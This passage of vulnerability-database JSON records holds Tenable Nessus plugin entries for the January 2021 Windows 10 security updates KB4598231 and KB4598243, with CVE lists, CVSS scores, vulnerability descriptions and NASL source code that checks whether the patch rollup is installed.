"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1674", 
"CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598231.NASL", "href": "https://www.tenable.com/plugins/nessus/144873", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144873);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n 
\"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"MSKB\", value:\"4598231\");\n script_xref(name:\"MSFT\", value:\"MS21-4598231\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598231: Windows 10 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. 
(CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. 
(CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. 
(CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598231/windows-10-update-kb4598231\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2a8452c3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598231.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598231'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598231])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-02T20:36:16", "description": "The remote Windows host is missing security updates. 
It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. 
(CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1651. 
(CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. 
(CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598243: Windows 10 Version 1607 and Windows Server 2016 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1645", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", 
"CVE-2021-1669", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598243.NASL", "href": "https://www.tenable.com/plugins/nessus/144882", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144882);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1642\",\n \"CVE-2021-1645\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n 
\"CVE-2021-1690\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598243\");\n script_xref(name:\"MSFT\", value:\"MS21-4598243\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0015-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598243: Windows 10 Version 1607 and Windows Server 2016 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. 
